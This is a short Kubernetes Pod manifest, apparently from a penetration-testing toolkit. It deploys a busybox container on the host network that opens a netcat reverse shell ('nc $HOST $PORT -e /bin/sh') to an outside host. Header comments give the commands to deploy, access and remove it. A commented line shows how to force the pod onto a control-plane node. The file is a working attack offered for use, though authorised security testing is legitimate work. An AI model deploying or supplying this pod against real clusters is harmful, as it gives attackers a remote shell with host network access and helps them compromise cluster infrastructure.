###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-hostnetwork-revshell.yaml 
## Access: kubectl -n [namespace] exec -it pod-hostnetwork-revshell -- bash
## Remove: kubectl -n [namespace] delete pod-hostnetwork-revshell
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-hostnetwork-revshell
  labels:
    app: pentest
spec:
  hostNetwork: true
  containers:
  - image: busybox
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc $HOST $PORT  -e /bin/sh;" ]
    name: hostnetwork-revshell
  # Force scheduling of your pod on control plane node by uncommenting this line and changing the name
  #nodeName: k8s-control-plane-node
